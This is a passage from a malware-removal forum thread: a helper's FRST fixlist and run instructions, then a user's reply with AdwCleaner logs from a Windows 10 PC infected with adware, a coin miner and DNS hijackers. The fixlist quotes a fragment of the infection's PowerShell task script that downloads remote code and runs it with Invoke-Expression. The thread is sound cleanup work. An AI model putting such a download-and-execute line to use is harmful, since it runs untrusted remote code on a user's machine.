 $ s c = d s t r ( w c ( $ s u r l ) ) ; I n v o k e - E x p r e s s i o n   - c o m m a n d   " $ s c " ; } c a t c h { } ; e x i t   0 ;  Task: {A345F50A-BEB5-406F-A86C-560F43BD91D0} - System32\Tasks\Dawidumb => C:\PROGRA~1\SHOPPE~3\Judtudl.bat Task: {A821AF47-1509-4B3F-B5FA-797801A40D84} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION Task: {C6F42ED2-181F-4404-A691-AC829C597ECC} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION Task: {C70D5ACB-BF20-4069-BEC7-C5C22BF6ED53} - System32\Tasks\{B2401880-868B-4022-9B90-2E43211FA2A1} => pcalua.exe -a C:\Users\Albert\AppData\Local\Temp\onlysetup.exe -c /uninstl Task: {CB41E405-22B9-424B-A7D1-615FB4AA8880} - \LaunchPreSignup -> No File <==== ATTENTION Task: {CCC268D1-108C-47A3-AFB7-1108122DF769} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION Task: {CFE7CC96-7FA9-453E-AFB9-F1664FC28077} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION Task: {D592DCF9-2794-412A-B4EA-791C6139B938} - System32\Tasks\Muueguehnlaek => C:\ProgramData\Muueguehnlaek\1.0.7.1\ibownaoe.exe Task: {D708A76D-DBD4-4641-B2B1-3EB0FC697EB3} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION Task: {E56F9A00-36D8-43DE-BA66-7C7D3C0FE24F} - System32\Tasks\Nhfolr => C:\PROGRA~1\SHOPPE~1\Jieczhi.bat Task: {E62EAA57-79B8-4DAB-A699-AAAC1363F68B} - System32\Tasks\PFExe => C:\Users\Albert\AppData\Local\PriceFountain\pricefountain.exe <==== ATTENTION Task: {E95CD12D-ECAD-44EA-84BA-C313E232D0E9} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION Task: {EFC17773-F9EA-461F-AFF9-5D48AC85435C} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION Task: {F07B4757-5DE7-4127-93F2-5840B62D68F0} - System32\Tasks\VJBJMDRJBRJCQACG => C:\ProgramData\Service1291\Service1291.exe [2016-02-15] () <==== ATTENTION Task: C:\WINDOWS\Tasks\NPSEYLEPFCUWGUQR.job => C:\ProgramData\Service1104\Service1104.exe <==== ATTENTION Task: C:\WINDOWS\Tasks\VJBJMDRJBRJCQACG.job => C:\ProgramData\Service1291\Service1291.exe <==== ATTENTIONClose Notepad.NOTE: It's important that both files, FRST64 and fixlist.txt are in the same location or the fix will not work. NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system Run FRST64 and press the Fix button just once and wait. If the tool needed a restart please make sure you let the system restart normally and let the tool complete its run after restart. The tool will make a log on the Desktop (Fixlog.txt). Attach it to your reply. Note: If the tool warns you about an outdated version please download and run the updated version. Link to post Share on other sites
ajdebenedictis 0 Posted February 19, 2016 Author Report Share Posted February 19, 2016 Hi Kevin Zoll, Thank you for your quick reply. I followed the instructions you sent and have copied and pasted the anti-malware reports you requested below. I noticed the file bsdriver.sys was not able to be removed. This file is located in the C:\Windows\System32\Drivers folder. Since I do not have Administrative privileges I am not able to remove any files in the System folder. I am the only user of the infected computer, so I would have thought I should have rights to delete any file I wish, however, this is not so. Please review the reports below and let me know what I need to do next. There are two AdwCleaner.txt files. One is AdwCleaner[C1].txt and the other is AdwCleaner[s1].txt. There is also the fixlog.txt report generated when I re-ran FRST.exe. Thank you very much for your help. I really Appreciate it. Al D. ------------------------------------------------------------------------------------------------------------------------------------------ AdwareCleaner[C1].txt # AdwCleaner v5.035 - Logfile created 19/02/2016 at 09:44:41 # Updated 18/02/2016 by Xplode # Database : 2016-02-16.2 [Local] # Operating system : Windows 10 Home (x64) # Username : Albert - AL # Running from : C:\Malware software - AdwCleaner\AdwCleaner.exe # Option : Cleaning # Support : http://toolslib.net/forum ***** [ Services ] ***** [-] Service Deleted : bsdriver [-] Service Deleted : WajaNetEn Monitor [-] Service Deleted : MPCKpt [-] Service Deleted : swsedrvr_vw_1_10_0_25 [-] Service Deleted : Update Checked List [-] Service Deleted : Util Great Hub [-] Service Deleted : wucotusy [-] Service Deleted : xycewozozbt [-] Service Deleted : zutuzuni ***** [ Folders ] ***** [-] Folder Deleted : C:\Program Files\shopperz150220161159 [-] Folder Deleted : C:\Program Files\shopperz160220160808 [-] Folder Deleted : C:\Program Files (x86)\DailyPCClean [-] Folder Deleted : C:\Program Files (x86)\DailyPcClean Support [-] Folder Deleted : C:\Program Files (x86)\DNS Unlocker [-] Folder Deleted : C:\Program Files (x86)\Max Driver Updater [-] Folder Deleted : C:\Program Files (x86)\MPC Cleaner [-] Folder Deleted : C:\Program Files (x86)\onlysearch [-] Folder Deleted : C:\Program Files (x86)\Simple for You [-] Folder Deleted : C:\Program Files (x86)\SystemHealer [-] Folder Deleted : C:\Program Files (x86)\Great Hub [-] Folder Deleted : C:\Program Files (x86)\90DB1DCE-1452822710-E311-B2A0-288023FF79AB [-] Folder Deleted : C:\Program Files (x86)\90DB1DCE-1452833790-E311-B2A0-288023FF79AB [-] Folder Deleted : C:\Program Files (x86)\90DB1DCE-1455839861-E311-B2A0-288023FF79AB [-] Folder Deleted : C:\Program Files (x86)\Checked List [!] Folder Not Deleted : C:\Program Files (x86)\Great Hub [-] Folder Deleted : C:\Program Files (x86)\Oasis Space [-] Folder Deleted : C:\ProgramData\Browser [-] Folder Deleted : C:\ProgramData\ZombieNews [-] Folder Deleted : C:\ProgramData\19a87fa1ec024bbcbb41931263354405 [-] Folder Deleted : C:\ProgramData\28341ff220e0446c9fff27c4493d622e [-] Folder Deleted : C:\ProgramData\DWdMD [-] Folder Deleted : C:\ProgramData\Muueguehnlaek [-] Folder Deleted : C:\ProgramData\Service1104 [-] Folder Deleted : C:\ProgramData\Service1291 [-] Folder Deleted : C:\ProgramData\{06fc4668-212c-0} [-] Folder Deleted : C:\ProgramData\{0cc60ce1-612c-1} [-] Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DailyPCClean [-] Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WajaNetEn [-] Folder Deleted : C:\Users\Albert\AppData\Local\BoBrowser [-] Folder Deleted : C:\Users\Albert\AppData\Local\DailyPcClean Support [-] Folder Deleted : C:\Users\Albert\AppData\Local\Professional_Cleaning_Sof [-] Folder Deleted : C:\Users\Albert\AppData\Local\Google\Chrome\User Data\Default\Extensions\jlcgehabolcakkjhgmgpkagpolbjlhfa [-] Folder Deleted : C:\Users\Albert\AppData\LocalLow\{D2020D47-707D-4E26-B4D9-739C4F4C2E9A} [-] Folder Deleted : C:\Users\Albert\AppData\Roaming\DailyPCClean [-] Folder Deleted : C:\Users\Albert\AppData\Roaming\NUIns [-] Folder Deleted : C:\Users\Albert\AppData\Roaming\Store [-] Folder Deleted : C:\Users\Albert\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\GUPlayer [-] Folder Deleted : C:\Users\Albert\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VOPackage [-] Folder Deleted : C:\Users\Albert\Documents\DailyPCClean [-] Folder Deleted : C:\Users\Albert\Documents\ProfessionalCleaningSoftware [-] Folder Deleted : C:\WINDOWS\Quicky Translator [#] Folder Deleted : C:\WINDOWS\SysNative\Tasks\Muueguehnlaek ***** [ Files ] ***** [-] File Deleted : C:\END [-] File Deleted : C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat [-] File Deleted : C:\Users\Albert\AppData\Roaming\Mozilla\Firefox\Profiles\gmzl01z0.default\user.js [-] File Deleted : C:\Users\Albert\AppData\Roaming\Mozilla\Firefox\Profiles\gmzl01z0.default\searchplugins\findit.xml [-] File Deleted : C:\Users\Albert\Desktop\DailyPCClean.lnk [-] File Deleted : C:\Users\Public\Desktop\eBay.lnk [-] File Deleted : C:\WINDOWS\SysNative\roboot64.exe [-] File Deleted : C:\WINDOWS\SysNative\LavasoftTcpService64.dll [-] File Deleted : C:\WINDOWS\SysNative\LavasoftTcpServiceOff.ini [-] File Deleted : C:\WINDOWS\SysNative\drivers\bsdriver.sys [-] File Deleted : C:\WINDOWS\SysNative\drivers\cherimoya.sys [-] File Deleted : C:\WINDOWS\SysNative\drivers\MPCKpt.sys [-] File Deleted : C:\WINDOWS\SysWOW64\findit.xml [-] File Deleted : C:\WINDOWS\SysWOW64\lavasofttcpservice.dll [-] File Deleted : C:\WINDOWS\SysWOW64\LavasoftTcpServiceOff.ini ***** [ DLLs ] ***** ***** [ Shortcuts ] ***** ***** [ Scheduled tasks ] ***** [-] Task Deleted : Run_Bobby_Browser [-] Task Deleted : LaunchPreSignup [-] Task Deleted : TidyNetwork Update [-] Task Deleted : DailyPCClean Schedule [-] Task Deleted : crash_service [-] Task Deleted : PFExe [-] Task Deleted : ProfessionalCleaningSoftware_Popup [-] Task Deleted : ProfessionalCleaningSoftware_Start [-] Task Deleted : DNS Monitoring [-] Task Deleted : Muueguehnlaek [-] Task Deleted : DNS Monitoring [-] Task Deleted : DNSETTRICK [-] Task Deleted : DNSROSEVILLE [-] Task Deleted : NPSEYLEPFCUWGUQR [-] Task Deleted : VJBJMDRJBRJCQACG ***** [ Registry ] ***** [-] Value Deleted : HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION [selection Tools.exe] [-] Key Deleted : HKCU\Software\Mozilla\Extends [-] Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\SEARCHSCOPES\IELNKSRCH [-] Key Deleted : HKLM\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\A7BD54B233B5B2F70AF86F5BD1A0C0A772A59FC6 [-] Key Deleted : HKLM\SOFTWARE\MICROSOFT\SystemCertificates\Root\Certificates\D830B6B8939ACB4928401060203BB648456BB4F8 [-] Key Deleted : HKLM\SOFTWARE\MICROSOFT\SystemCertificates\Root\Certificates\F53E693DDABF57A88A9B12B608B09B26C0608B74 [-] Key Deleted : HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\26D9E607FFF0C58C7844B47FF8B6E079E5A2220E [-] Key Deleted : HKLM\SOFTWARE\5da059a482fd494db3f252126fbc3d5b [-] Key Deleted : HKLM\SOFTWARE\shopperz150120160349 [-] Value Deleted : HKLM\SOFTWARE\Mozilla\Firefox\Extensions [[email protected]] [-] Value Deleted : HKLM\SOFTWARE\Mozilla\Firefox\Extensions [[email protected]] [-] Key Deleted : HKLM\SOFTWARE\Google\Chrome\Extensions\dmidaiabaeipgkcooijbikmdcofhpakp [-] Key Deleted : HKCU\Software\Google\Chrome\Extensions\jlcgehabolcakkjhgmgpkagpolbjlhfa [-] Key Deleted : HKLM\SOFTWARE\Classes\AppID\3045035B-3C14-4698-8AC4-ADB18CC42C1E [-] Key Deleted : HKCU\Software\Classes\CLSID\{9C4EFBD5-1ADF-41E6-BE26-AF44326E30E4} [-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{051E9166-B275-4683-907B-372FAE22BC7C} [-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{E5A7A645-8318-4895-B85C-EDC606B80DB6} [-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{459DD0F7-0D55-D3DC-67BC-E6BE37E9D762} [-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{B608CC98-54DE-4775-96C9-097DE398500C} [-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{F83D1872-D9FF-47F8-B5A0-49CC51E24EE8} [-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{9C4EFBD5-1ADF-41E6-BE26-AF44326E30E4} [-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{A2970C7C-8392-4E6F-8B51-B763CF38E13C} [-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{567DBF58-4713-45F4-A623-E7B41F898209} [-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{3BEACC4A-B617-4519-BB20-E5970414CBE4} [-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{8FF10FED-2F0A-4F7F-BE87-B04F1DCD4319} [-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{FD20C151-A061-4097-955D-682F317A7035} [!] Key Not Deleted : HKLM\SOFTWARE\Classes\CLSID\{567dbf58-4713-45f4-a623-e7b41f898209} [-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{59E4833B-32B3-45A3-B28C-4349694AEA0B} [-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{6EDC6CDA-ED56-4E35-B0C9-FC7BE7E5785E} [-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{48DD0C01-D406-4CDF-A47D-50F22ECBB63A} [-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{5203590B-4F3D-45B6-8481-7A15CF21E7E1} [-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{764EADA5-B946-4AD8-B4D6-5CD91834FF0E} [-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{567DBF58-4713-45F4-A623-E7B41F898209} [-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{3BEACC4A-B617-4519-BB20-E5970414CBE4} [!] Key Not Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{567dbf58-4713-45f4-a623-e7b41f898209} [-] Key Deleted : HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B49699FC-1665-4414-A1CB-C4A2A4A13EEC} [-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B49699FC-1665-4414-A1CB-C4A2A4A13EEC} [-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B608CC98-54DE-4775-96C9-097DE398500C} [-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{3BEACC4A-B617-4519-BB20-E5970414CBE4} [-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{B49699FC-1665-4414-A1CB-C4A2A4A13EEC} [-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{B608CC98-54DE-4775-96C9-097DE398500C} [-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{3BEACC4A-B617-4519-BB20-E5970414CBE4} [-] Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7D87094D-49E1-4C72-8C9E-3D937A119BE5} [-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\CLSID\{051E9166-B275-4683-907B-372FAE22BC7C} [-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\CLSID\{E5A7A645-8318-4895-B85C-EDC606B80DB6} [-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\CLSID\{9C4EFBD5-1ADF-41E6-BE26-AF44326E30E4} [-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\CLSID\{A2970C7C-8392-4E6F-8B51-B763CF38E13C} [-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{59E4833B-32B3-45A3-B28C-4349694AEA0B} [-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{6EDC6CDA-ED56-4E35-B0C9-FC7BE7E5785E} [-] Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7D87094D-49E1-4C72-8C9E-3D937A119BE5} [-] Key Deleted : HKCU\Software\BoBrowser [-] Key Deleted : HKCU\Software\DAILYPCCLEAN [-] Key Deleted : HKCU\Software\Microsoft\Tinstalls [!] Key Not Deleted : HKCU\Software\Mozilla\Extends [-] Key Deleted : HKCU\Software\ProfessionalCleaningSoftwareLanguage [-] Key Deleted : HKCU\Software\Reg\Clean [-] Key Deleted : HKCU\Software\Store [-] Key Deleted : HKCU\Software\tstamptoken [-] Key Deleted : HKCU\Software\Tutorials [-] Key Deleted : HKCU\Software\TutoTag [-] Key Deleted : HKCU\Software\WTools [-] Key Deleted : HKCU\Software\AppDataLow\Software\{3BDFD1D7-7A9B-4D29-80B3-D00E66E62885} [-] Key Deleted : HKCU\Software\AppDataLow\Software\DailyWiki [-] Key Deleted : HKCU\Software\AppDataLow\Software\DynConIE [-] Key Deleted : HKCU\Software\AppDataLow\Software\TidyNetwork [-] Key Deleted : HKLM\SOFTWARE\{3BDFD1D7-7A9B-4D29-80B3-D00E66E62885} [-] Key Deleted : HKLM\SOFTWARE\Clara [-] Key Deleted : HKLM\SOFTWARE\DAILYPCCLEAN [-] Key Deleted : HKLM\SOFTWARE\FFPluginHp [-] Key Deleted : HKLM\SOFTWARE\FlashBeat [-] Key Deleted : HKLM\SOFTWARE\istartpageingSoftware [-] Key Deleted : HKLM\SOFTWARE\Professional Cleaning Software [-] Key Deleted : HKLM\SOFTWARE\Reg\Clean [-] Key Deleted : HKLM\SOFTWARE\SmartDNS [-] Key Deleted : HKLM\SOFTWARE\SpaceSondPro [-] Key Deleted : HKLM\SOFTWARE\SwiftSearch_1.10.0.25 [-] Key Deleted : HKLM\SOFTWARE\Tutorials [-] Key Deleted : HKLM\SOFTWARE\WajaNetEn [-] Key Deleted : HKLM\SOFTWARE\WdsManPro [-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{E1527582-8509-4011-B922-29E3FB548882}_is1 [-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7ADF667E-E14D-4D2C-827C-B0108F0D93BC} [-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{8DBC5A0A-31C4-46C7-B252-6B593EA11A87} [-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E1527582-8509-4011-B922-29E3FB548882}_is1 [-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DailyPCClean_is1 [-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\NUIns [-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ZombieNews [-] Key Deleted : [x64] HKLM\SOFTWARE\FlashBeat [-] Key Deleted : [x64] HKLM\SOFTWARE\WajaNetEn [-] Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E1527582-8509-4011-B922-29E3FB548882}_is1 [-] Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\cpuminer [-] Key Deleted : HKU\.DEFAULT\Software\AppDataLow\Software\Compete [-] Key Deleted : HKLM\SOFTWARE\Classes\Installer\Features\4E30E037E0535E84D9E3349209D354D4 [-] Key Deleted : HKLM\SOFTWARE\Classes\Installer\Products\4E30E037E0535E84D9E3349209D354D4 [-] Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\4E30E037E0535E84D9E3349209D354D4 [!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Installer\Products\4E30E037E0535E84D9E3349209D354D4 [-] Value Deleted : HKCU\Software\Microsoft\Internet Explorer\SearchScopes [DoNotAskAgain] [-] Key Deleted : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{015DB5FA-EAFB-4592-A95B-F44D3EE87FA9} [-] Key Deleted : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} [-] Key Deleted : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{187E1DF6-DFD0-4217-B13D-6069A2CE3B70} [-] Key Deleted : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{398B2D84-6A60-43BD-9832-6B70D8E6F841} [-] Key Deleted : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{ielnksrch} [-] Data Restored : HKCU\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope] [!] Key Not Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\ielnksrch [-] Value Deleted : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes [DoNotAskAgain] [-] Data Restored : HKLM\SOFTWARE\Clients\StartMenuInternet\IEXPLORE.EXE\shell\open\command [] [-] Data Restored : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters [NameServer] [-] Data Restored : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{5b2806b2-f442-4f31-8ba9-5b5aff22f10b} [NameServer] [-] Data Restored : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{703089d7-b1ac-4a63-9543-776aae06c9b1} [NameServer] [-] Data Restored : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{7fed4267-ce71-4810-99d1-c4794f8e87f7} [NameServer] [-] Data Restored : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{5b2806b2-f442-4f31-8ba9-5b5aff22f10b} [NameServer] [-] Data Restored : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{703089d7-b1ac-4a63-9543-776aae06c9b1} [NameServer] [-] Data Restored : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{7fed4267-ce71-4810-99d1-c4794f8e87f7} [NameServer] [-] Value Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Run [CrashService] [-] Value Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Run [itibiti.exe] [-] Value Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Run [QuickyTranslator] [-] Value Deleted : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [cpuminer] [-] Value Deleted : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [spaceSoundPro] ***** [ Web browsers ] ***** [-] [C:\Users\Albert\AppData\Roaming\Mozilla\Firefox\Profiles\gmzl01z0.default\prefs.js] [Preference] Deleted : user_pref("browser.search.defaultenginename.US", "findit"); [-] [C:\Users\Albert\AppData\Local\Google\Chrome\User Data\Default\Web Data] [search Provider] Deleted : aol.com [-] [C:\Users\Albert\AppData\Local\Google\Chrome\User Data\Default\Web Data] [search Provider] Deleted : ask.com [-] [C:\Users\Albert\AppData\Local\Google\Chrome\User Data\Default\Web Data] [search Provider] Deleted : www-searching.com [-] [C:\Users\Albert\AppData\Local\Google\Chrome\User Data\Default\Web Data] [search Provider] Deleted : mpc safe search ************************* :: "Tracing" keys removed :: Winsock settings cleared ########## EOF - C:\AdwCleaner\AdwCleaner[C1].txt - [16320 bytes] ########## ---------------------------------------------------------------------------------------------------------------------------------------------- AdwareCleaner[s1].txt # AdwCleaner v5.035 - Logfile created 19/02/2016 at 09:40:06 # Updated 18/02/2016 by Xplode # Database : 2016-02-16.2 [Local] # Operating system : Windows 10 Home (x64) # Username : Albert - AL # Running from : C:\Malware software - AdwCleaner\AdwCleaner.exe # Option : Scan # Support : http://toolslib.net/forum ***** [ Services ] ***** Service Found : bsdriver Service Found : WajaNetEn Monitor Service Found : MPCKpt Service Found : swsedrvr_vw_1_10_0_25 Service Found : Update Checked List Service Found : Util Great Hub Service Found : wucotusy Service Found : xycewozozbt Service Found : zutuzuni ***** [ Folders ] ***** Folder Found : C:\Program Files\shopperz150220161159 Folder Found : C:\Program Files\shopperz160220160808 Folder Found : C:\Program Files (x86)\DailyPCClean Folder Found : C:\Program Files (x86)\DailyPcClean Support Folder Found : C:\Program Files (x86)\DNS Unlocker Folder Found : C:\Program Files (x86)\Max Driver Updater Folder Found : C:\Program Files (x86)\MPC Cleaner Folder Found : C:\Program Files (x86)\onlysearch Folder Found : C:\Program Files (x86)\Simple for You Folder Found : C:\Program Files (x86)\SystemHealer Folder Found : C:\Program Files (x86)\Great Hub Folder Found : C:\Program Files (x86)\90DB1DCE-1452822710-E311-B2A0-288023FF79AB Folder Found : C:\Program Files (x86)\90DB1DCE-1452833790-E311-B2A0-288023FF79AB Folder Found : C:\Program Files (x86)\90DB1DCE-1455839861-E311-B2A0-288023FF79AB Folder Found : C:\Program Files (x86)\Checked List Folder Found : C:\Program Files (x86)\Great Hub Folder Found : C:\Program Files (x86)\Oasis Space Folder Found : C:\ProgramData\Browser Folder Found : C:\ProgramData\ZombieNews Folder Found : C:\ProgramData\19a87fa1ec024bbcbb41931263354405 Folder Found : C:\ProgramData\28341ff220e0446c9fff27c4493d622e Folder Found : C:\ProgramData\DWdMD Folder Found : C:\ProgramData\Muueguehnlaek Folder Found : C:\ProgramData\Service1104 Folder Found : C:\ProgramData\Service1291 Folder Found : C:\ProgramData\{06fc4668-212c-0} Folder Found : C:\ProgramData\{0cc60ce1-612c-1} Folder Found : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DailyPCClean Folder Found : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WajaNetEn Folder Found : C:\Users\Albert\AppData\Local\BoBrowser Folder Found : C:\Users\Albert\AppData\Local\DailyPcClean Support Folder Found : C:\Users\Albert\AppData\Local\Professional_Cleaning_Sof Folder Found : C:\Users\Albert\AppData\Local\Google\Chrome\User Data\Default\Extensions\jlcgehabolcakkjhgmgpkagpolbjlhfa Folder Found : C:\Users\Albert\AppData\LocalLow\{D2020D47-707D-4E26-B4D9-739C4F4C2E9A} Folder Found : C:\Users\Albert\AppData\Roaming\DailyPCClean Folder Found : C:\Users\Albert\AppData\Roaming\NUIns Folder Found : C:\Users\Albert\AppData\Roaming\Store Folder Found : C:\Users\Albert\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\GUPlayer Folder Found : C:\Users\Albert\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VOPackage Folder Found : C:\Users\Albert\Documents\DailyPCClean Folder Found : C:\Users\Albert\Documents\ProfessionalCleaningSoftware Folder Found : C:\WINDOWS\Quicky Translator Folder Found : C:\WINDOWS\SysNative\Tasks\Muueguehnlaek ***** [ Files ] ***** File Found : C:\END File Found : C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat File Found : C:\Users\Albert\AppData\Roaming\Mozilla\Firefox\Profiles\gmzl01z0.default\user.js File Found : C:\Users\Albert\AppData\Roaming\Mozilla\Firefox\Profiles\gmzl01z0.default\searchplugins\findit.xml File Found : C:\Users\Albert\Desktop\DailyPCClean.lnk File Found : C:\Users\Public\Desktop\eBay.lnk File Found : C:\WINDOWS\SysNative\roboot64.exe File Found : C:\WINDOWS\SysNative\LavasoftTcpService64.dll File Found : C:\WINDOWS\SysNative\LavasoftTcpServiceOff.ini File Found : C:\WINDOWS\SysNative\drivers\bsdriver.sys File Found : C:\WINDOWS\SysNative\drivers\cherimoya.sys File Found : C:\WINDOWS\SysNative\drivers\MPCKpt.sys File Found : C:\WINDOWS\SysWOW64\findit.xml File Found : C:\WINDOWS\SysWOW64\lavasofttcpservice.dll File Found : C:\WINDOWS\SysWOW64\LavasoftTcpServiceOff.ini ***** [ DLL ] ***** ***** [ Shortcuts ] ***** ***** [ Scheduled tasks ] ***** Task Found : Run_Bobby_Browser Task Found : LaunchPreSignup Task Found : TidyNetwork Update Task Found : DailyPCClean Schedule Task Found : crash_service Task Found : PFExe Task Found : ProfessionalCleaningSoftware_Popup Task Found : ProfessionalCleaningSoftware_Start Task Found : DNS Monitoring Task Found : Muueguehnlaek Task Found : DNS Monitoring Task Found : DNSETTRICK Task Found : DNSROSEVILLE Task Found : NPSEYLEPFCUWGUQR Task Found : VJBJMDRJBRJCQACG ***** [ Registry ] ***** Value Found : HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION [selection Tools.exe] Key Found : HKCU\Software\Mozilla\Extends Key Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\SEARCHSCOPES\IELNKSRCH Key Found : HKLM\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\A7BD54B233B5B2F70AF86F5BD1A0C0A772A59FC6 Key Found : HKLM\SOFTWARE\MICROSOFT\SystemCertificates\Root\Certificates\D830B6B8939ACB4928401060203BB648456BB4F8 Key Found : HKLM\SOFTWARE\MICROSOFT\SystemCertificates\Root\Certificates\F53E693DDABF57A88A9B12B608B09B26C0608B74 Key Found : HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\26D9E607FFF0C58C7844B47FF8B6E079E5A2220E Key Found : HKLM\SOFTWARE\5da059a482fd494db3f252126fbc3d5b Key Found : HKLM\SOFTWARE\shopperz150120160349 Value Found : HKLM\SOFTWARE\Mozilla\Firefox\Extensions [[email protected]] Value Found : HKLM\SOFTWARE\Mozilla\Firefox\Extensions [[email protected]] Key Found : HKLM\SOFTWARE\Google\Chrome\Extensions\dmidaiabaeipgkcooijbikmdcofhpakp Key Found : HKCU\Software\Google\Chrome\Extensions\jlcgehabolcakkjhgmgpkagpolbjlhfa Key Found : HKLM\SOFTWARE\Classes\AppID\3045035B-3C14-4698-8AC4-ADB18CC42C1E Key Found : HKCU\Software\Classes\CLSID\{9C4EFBD5-1ADF-41E6-BE26-AF44326E30E4} Key Found : HKLM\SOFTWARE\Classes\CLSID\{051E9166-B275-4683-907B-372FAE22BC7C} Key Found : HKLM\SOFTWARE\Classes\CLSID\{E5A7A645-8318-4895-B85C-EDC606B80DB6} Key Found : 